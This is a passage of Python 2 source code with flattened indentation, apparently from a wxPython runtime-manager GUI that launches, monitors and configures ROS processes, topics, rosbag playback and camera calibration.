v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[ name ] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
self.update_depend_enable(pdic, gdic, prm)
d = self.cfg_dic( {'pdic':pdic, 'gdic':gdic, 'param':prm}, sys=True )
self.update_proc_cpu(d.get('obj'), d.get('pdic'), d.get('param'))
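# Apply nice value, CPU affinity and (optionally) a real-time scheduling policy
# to the process behind obj and all of its children, via the external proc manager.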
def update_proc_cpu(self, obj, pdic=None, prm=None):
if obj is None or not obj.GetValue():
return
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc is None:
return
if pdic is None or prm is None:
(pdic, _, prm) = self.obj_to_pdic_gdic_prm(obj, sys=True)
cpu_chks = self.param_value_get(pdic, prm, 'cpu_chks')
cpu_chks = cpu_chks if cpu_chks else [ True for i in range(get_cpu_count()) ]
cpus = [ i for i in range(get_cpu_count()) if cpu_chks[i] ]
nice = self.param_value_get(pdic, prm, 'nice', 0)
d = { 'OTHER':SCHED_OTHER, 'FIFO':SCHED_FIFO, 'RR':SCHED_RR }
policy = SCHED_OTHER
priority = 0
if self.param_value_get(pdic, prm, 'real_time', False):
policy = d.get(self.param_value_get(pdic, prm, 'policy', 'FIFO'), SCHED_FIFO)
priority = self.param_value_get(pdic, prm, 'prio', 0)
procs = [ proc ] + proc.get_children(recursive=True)
for proc in procs:
print 'pid={}'.format(proc.pid)
if proc.get_nice() != nice:
print 'nice {} -> {}'.format(proc.get_nice(), nice)
if set_process_nice(proc, nice) is False:
print 'Err set_process_nice()'
if proc.get_cpu_affinity() != cpus:
print 'cpus {} -> {}'.format(proc.get_cpu_affinity(), cpus)
if set_process_cpu_affinity(proc, cpus) is False:
print 'Err set_process_cpu_affinity()'
policy_str = next( (k for (k,v) in d.items() if v == policy), '?')
print 'sched policy={} prio={}'.format(policy_str, priority)
if set_scheduling_policy(proc, policy, priority) is False:
print 'Err scheduling_policy()'
def param_value_get(self, pdic, prm, name, def_ret=None):
def_ret = self.param_default_value_get(prm, name, def_ret)
return pdic.get(name, def_ret) if pdic else def_ret
def param_default_value_get(self, prm, name, def_ret=None):
return next( (var.get('v') for var in prm.get('vars') if var.get('name') == name ), def_ret) \
if prm else def_ret
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval( gdic_v.get('depend_bool', 'lambda v : bool(v)') )
v = depend_bool(v)
enables_set(vp, 'depend', v)
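# Fill a ROS message of type prm['msg'] from pdic (dotted names map to nested
# attributes) and publish it on prm['pub']. The sign of twist.angular.z is
# flipped for /twist_cmd, and header.stamp is set when the 'stamp' flag is present.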
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[ prm['msg'] ]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[ obj.__slots__.index(attr) ]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
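# Push pdic values whose var declares a 'rosparam' name to the ROS parameter
# server, skipping values that are already up to date; an empty value deletes an
# existing parameter.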
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = { 'True':'true', 'False':'false' }
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = [ 'rosparam', 'list' ]
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = [ 'rosparam', 'get', rosparam ]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = [ 'rosparam', 'set', rosparam, v ] if v != '' else [ 'rosparam', 'delete', rosparam ]
print("ROSparam_set")
print(cmd)
subprocess.call(cmd)
#
# Sensing Tab
#
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnROSbagRecord(self, event):
self.dlg_rosbag_record.Show()
obj = event.GetEventObject()
set_val(obj, False)
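# Recursively build a checkbox tree from a YAML dict: entries with 'subs' become
# (static box) sizers, leaves become wx.CheckBox objects whose 'probe'/'run'
# commands are registered in probe_dic/run_dic and which may get a [config] link.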
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
if 'name' not in dic:
return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 4)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
if 'param' in dic:
obj = self.add_config_link(dic, panel, obj)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def add_config_link(self, dic, panel, obj):
cfg_obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, '[config]', '')
fix_link_color(cfg_obj)
self.Bind(wx.EVT_HYPERLINK, self.OnConfig, cfg_obj)
add_objs = (obj, wx.StaticText(panel, wx.ID_ANY, ' '), cfg_obj)
hszr = sizer_wrap(add_objs, wx.HORIZONTAL)
name = dic['name']
pdic = self.load_dic_pdic_setup(name, dic)
gdic = self.gdic_get_1st(dic)
prm = self.get_param(dic.get('param'))
self.add_cfg_info(cfg_obj, obj, name, pdic, gdic, True, prm)
return hszr
def camera_ids(self):
if self.button_synchronization.GetValue():
return []
cmd = "rostopic list | sed -n 's|/image_raw||p' | sed s/^$//"
return subprocess.check_output(cmd, shell=True).strip().split()
def cam_id_to_obj(self, cam_id, v):
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
if cam_id_obj is None:
cam_id_obj = StrValObj(cam_id, v)
cam_id_obj.SetValue(v)
return cam_id_obj
def camera_id_hook(self, args):
new_id = args.get('pdic', {}).get('camera_id', '')
ids = args.get('ids', [])
if new_id not in ids:
return
idx = ids.index(new_id)
pp = args.get('param_panel')
if pp:
pp.detach_func()
dlg = args.get('dlg')
if dlg:
dlg.EndModal(idx + 100)
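# Calibration publisher handling: clone the pdic/gdic setup for every detected
# camera id, loop over the per-camera parameter dialog (camera_id_hook switches
# cameras by ending the dialog with EndModal(idx + 100); Cancel restores the
# saved pdics), then launch/kill one process per camera id.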
def OnCalibrationPublisher(self, event):
obj = event.GetEventObject()
(_, gdic_org, prm) = self.obj_to_pdic_gdic_prm(obj)
if obj.GetValue():
gdic_org['ids'] = self.camera_ids()
ids = gdic_org.get('ids', [])
if ids == []:
self.OnLaunchKill(event)
return
#
# setup
#
(cmd_dic, cmd, _) = self.obj_to_cmd_dic_cmd_proc(obj)
flags = gdic_org.get('flags', [])[:] # copy
if 'open_dialog' in flags:
flags.remove('open_dialog')
pdic_baks = {}
for cam_id in ids:
(pdic_a, gdic_a, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic = pdic_a if pdic_a else self.load_dic_pdic_setup(cam_id, {})
pdic_baks[cam_id] = pdic.copy()
gdic = gdic_a if gdic_a else gdic_org.copy()
gdic['flags'] = flags
cam_id_obj = self.cam_id_to_obj(cam_id, obj.GetValue())
if not pdic_a or not gdic_a:
self.add_cfg_info(cam_id_obj, cam_id_obj, cam_id, pdic, gdic, False, prm)
if cam_id_obj not in cmd_dic:

cmd_dic[ cam_id_obj ] = (cmd, None)
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
#
# Dialog
#
cam_id = ids[0]
while obj.GetValue():
(pdic, gdic, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic['camera_id'] = cam_id
dic_list_push(gdic, 'dialog_type', 'open2')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
gdic_v = dic_getset(gdic, 'camera_id', {})
args = { 'pdic':pdic, 'ids':ids, 'param_panel':gdic.get('param_panel'), 'dlg':dlg }
gdic_v['hook_var'] = { 'hook':self.camera_id_hook, 'args':args }
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
pdic['camera_id'] = cam_id # restore
if dlg_ret == 0: # OK
break
idx = dlg_ret - 100
if idx < 0 or len(ids) <= idx: # Cancel
for cam_id in ids:
(pdic, _, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic.update(pdic_baks.get(cam_id))
set_val(obj, False)
return
# Menu changed
cam_id = ids[idx]
#
# Launch / Kill
#
for cam_id in ids:
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
(pdic, _, _) = self.obj_to_pdic_gdic_prm(cam_id_obj)
pdic['solo_camera'] = False
#print '@', cam_id, cam_id_obj.GetValue()
self.OnLaunchKill_obj(cam_id_obj)
#
# Input ROSbag File Tab
#
def rosbag_info_hook(self, v):
if not v:
return
th_start(self.rosbag_info_hook_th, {'v':v} )
def rosbag_info_hook_th(self, ev, v): # thread
err = subprocess.STDOUT
s = subprocess.check_output([ 'rosbag', 'info', v ], stderr=err).strip()
wx.CallAfter(self.label_rosbag_info.SetLabel, s)
wx.CallAfter(self.label_rosbag_info.GetParent().FitInside)
def info_col(self, v, v_yellow, v_red, col_normal, col_red):
if v < v_yellow:
return col_normal
if v < v_red:
(nr,ng,nb) = col_normal
(rr,rg,rb) = col_red
return ( (nr+rr)/2, (ng+rg)/2, (nb+rb)/2 )
return col_red
def mem_kb_info(self):
lst = subprocess.check_output(['free']).strip().split('\n')[2].split()[2:4]
used = int(lst[0])
free = int(lst[1])
return (used + free, used)
def toprc_create(self):
(child_pid, fd) = pty.fork()
if child_pid == 0: # child
os.execvp('top', ['top'])
else: #parent
sec = 0.2
for s in ['1', 'c', 'W', 'q']:
time.sleep(sec)
os.write(fd, s)
def toprc_setup(self, toprc, backup):
if os.path.exists(toprc):
os.rename(toprc, backup)
self.toprc_create()
def toprc_restore(self, toprc, backup):
os.remove(toprc)
if os.path.exists(backup):
os.rename(backup, toprc)
# top command thread
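# Periodically runs 'top -b -n 2', shows the raw output in label_top_cmd, parses
# the per-CPU '%Cpu' lines and reads memory usage via mem_kb_info(), updates the
# InfoBarLabel gauges and the top-5 process labels, and starts/stops the blinking
# alert thread when the configured CPU/memory rates are exceeded.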
def top_cmd_th(self, ev, setting, cpu_ibls, mem_ibl, toprc, backup):
interval = setting.get('interval', 3)
alert_level = setting.get('alert_level', {})
rate_per_cpu = alert_level.get('rate_per_cpu', 80)
rate_per_cpu_yellow = alert_level.get('rate_per_cpu_yellow', 80)
rate_cpu = alert_level.get('rate_cpu', 80)
rate_mem = alert_level.get('rate_mem', 80)
rate_mem_yellow = alert_level.get('rate_mem_yellow', 80)
for ibl in cpu_ibls:
ibl.lmt_bar_prg = rate_per_cpu
mem_ibl.lmt_bar_prg = rate_mem
alerted = False
cpu_n = get_cpu_count()
while not ev.wait(interval):
s = subprocess.check_output(['sh', '-c', 'env COLUMNS=512 top -b -n 2 -d 0.1']).strip()
i = s.rfind('\ntop -') + 1
s = s[i:]
wx.CallAfter(self.label_top_cmd.SetLabel, s)
wx.CallAfter(self.label_top_cmd.GetParent().FitInside)
k = '%Cpu'
fv_sum = 0
i = 0
for t in s.split('\n'):
if t[:len(k)] != k:
continue
lst = t[1:].split()
v = lst[1] if lst[1] != ':' else lst[2]
if v[0] == ':':
v = v[1:]
fv = str_to_float(v)
col = self.info_col(fv, rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
if i < cpu_n:
ibl = cpu_ibls[i]
wx.CallAfter(ibl.lb_set, v+'%', col)
wx.CallAfter(ibl.bar_set, int(fv))
fv_sum += fv
i += 1
k = 'KiB Mem:'
(total, used) = self.mem_kb_info()
rate = 100 * used / total
for u in [ 'KB', 'MB', 'GB', 'TB' ]:
if total <= 10 * 1024 or used <= 10:
break
total /= 1024
used /= 1024
col = self.info_col(rate, rate_mem_yellow, rate_mem, (64,64,64), (200,0,0))
tx = str(used) + u + '/' + str(total) + u + '(' + str(rate) + '%)'
wx.CallAfter(mem_ibl.lb_set, tx, col)
wx.CallAfter(mem_ibl.bar_set, rate)
is_alert = (fv_sum >= rate_cpu * cpu_n) or rate >= rate_mem
# --> for test
if os.path.exists('/tmp/alert_test_on'):
is_alert = True
if os.path.exists('/tmp/alert_test_off'):
is_alert = False
# <-- for test
if is_alert and not alerted:
thinf = th_start(self.alert_th, {'bgcol':(200,50,50)})
alerted = True
if not is_alert and alerted:
th_end(thinf)
alerted = False
# top5
i = s.find('\n\n') + 2
lst = s[i:].split('\n')
hd = lst[0]
top5 = lst[1:1+5]
i = hd.rfind('COMMAND')
cmds = [ line[i:].split(' ')[0] for line in top5 ]
i = hd.find('%CPU')
loads = [ line[i-1:].strip().split(' ')[0] for line in top5 ]
for (lb, cmd, load) in zip(self.lb_top5, cmds, loads):
col = self.info_col(str_to_float(load), rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
wx.CallAfter(lb.SetForegroundColour, col)
wx.CallAfter(lb.SetLabel, cmd + ' (' + load + ' %CPU)')
self.toprc_restore(toprc, backup)
def alert_th(self, bgcol, ev):
wx.CallAfter(self.RequestUserAttention)
c = bgcol
o = wx.NullColour
while not ev.wait(0.5):
for col in [ c, o, c, o, c, o ]:
wx.CallAfter(self.set_bg_all_tabs, col)
time.sleep(0.05)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def logout_th(self, que, interval, tc, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
ckbox = self.checkbox_stdout if que == self.log_que_stdout else self.checkbox_stderr
if ckbox.GetValue():
self.log_que_show.put( cut_esc(s) )
else: # == self.log_que
f = None
path = self.status_dic.get('log_path')
is_syslog = (path == 'syslog')
if is_syslog:
ident = sys.argv[0].split('/')[-1]
syslog.openlog(ident, syslog.LOG_PID | syslog.LOG_CONS)
elif path:
path = os.path.expandvars(os.path.expanduser(path))
f = open(path, 'a') if path else None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if is_syslog:
syslog.syslog(s)
elif f:
f.write(s)
f.flush()
if is_syslog:
syslog.closelog()
if f:
f.close()
def logshow_th(self, que, interval, tc, ev):
while not ev.wait(interval):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
wx.CallAfter(append_tc_limit, tc, s)
# que clear
if self.checkbox_stdout.GetValue() is False and \
self.checkbox_stderr.GetValue() is False and \
que.qsize() > 0:
que_clear(que)
wx.CallAfter(tc.Clear)
#
# for Topics tab
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output([ 'rostopic', 'info', topic ]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen([ 'rostopic', 'echo', topic ], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
#proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
#
# Common Utils
#
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[ k ] = gdic.get(k, []) + [ panel ]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def OnConfig(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[ prm['msg'] ]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[ cfg_obj ] = { 'obj':obj , 'name':name , 'pdic':pdic , 'gdic':gdic,
'run_disable':run_disable , 'param':prm }
def get_param(self, prm_name):
return next( (prm for prm in self.params if prm['name'] == prm_name), None)
def get_var(self, prm, var_name, def_ret=None):
return next( (var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def obj_to_cmd_dic(self, obj):
return next( (cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return (cmd_dic, cmd, proc)
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue()
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
# print("add_args", add_args)
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
if proc:
self.update_proc_cpu(obj)
def OnROSbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play)
self.button_confirm_depth.Disable()
set_val(stop, False)
self.button_play_rosbag_play2.Disable()
set_val(pause, False)
self.button_confirm_topics.Disable()
elif obj == stop:
set_val(stop, True)
self.button_confirm_depth.Enable()
set_val(play, False)
self.button_play_rosbag_play2.Enable()
set_val(pause, False)
self.button_confirm_topics.Enable()
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def OnFtrace(self, event):
obj = event.GetEventObject()
cmd = 'rosrun runtime_manager ftrace.py'
v = obj.GetValue()
self.ftrace_proc_ = self.launch_kill(v, cmd,
None if v else self.ftrace_proc_, obj=obj)
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
# thread
def point_cloud_progress_bar(self, file, ev):
obj = self.button_point_cloud
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('path_pcd', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print s
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
# thread
def rosbag_play_progress_bar(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar.clear)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total.SetLabel, '')
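# Mirror the enabled state and value of obj to the other widgets in its alias
# group (alias_grps), presumably duplicated controls shown on several tabs.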
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
if key:
enables_set(o, key, en)
else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
o.SetInsertionPointEnd()
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next( (grp for grp in self.alias_grps if obj in grp), [])
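# Recursively build the CustomTreeCtrl from YAML items: items with a 'cmd'
# become checkbox nodes registered in cmd_dic, and every node gets an item
# window with 'sys' and (optionally) 'app' config hyperlinks created by new_link().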
def create_tree(self, parent, items, tree, item, cmd_dic):
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
self.new_link(item, name, pdic, self.sys_gdic, pnl, 'sys', 'sys', add_objs)
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'app', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, ' ') ]
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']') ]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[ name ] = pdic
return pdic
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj, kill_children=True)
(cfg_obj, dic) = self.cfg_obj_dic( {'obj':obj} )
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
if not v:
self.stat_label_off(obj)
def launch_kill_proc2(self, obj, cmd_dic, add_args=None, is_rapid_delete=None):
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj, is_rapid_delete=is_rapid_delete)
cmd_dic[obj] = (cmd, proc)
return proc
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next( (obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
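# Central launch/kill helper. On launch, splits cmd with shlex, starts it via
# psutil.Popen and wires stdout/stderr to the log threads (or to a custom
# 'stdout_func' from gdic); on kill, terminates the process (and optionally its
# children, using SIGINT unless the 'SIGTERM' flag or is_rapid_delete is set)
# and returns the new proc handle (None after a kill).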
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None, is_rapid_delete=False):
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file':proc.stdout, 'que':self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file':proc.stderr, 'que':self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file':proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if is_rapid_delete:
sigint = False
flags = ["SIGTERM", "kill_children"]
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
proc.wait()
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
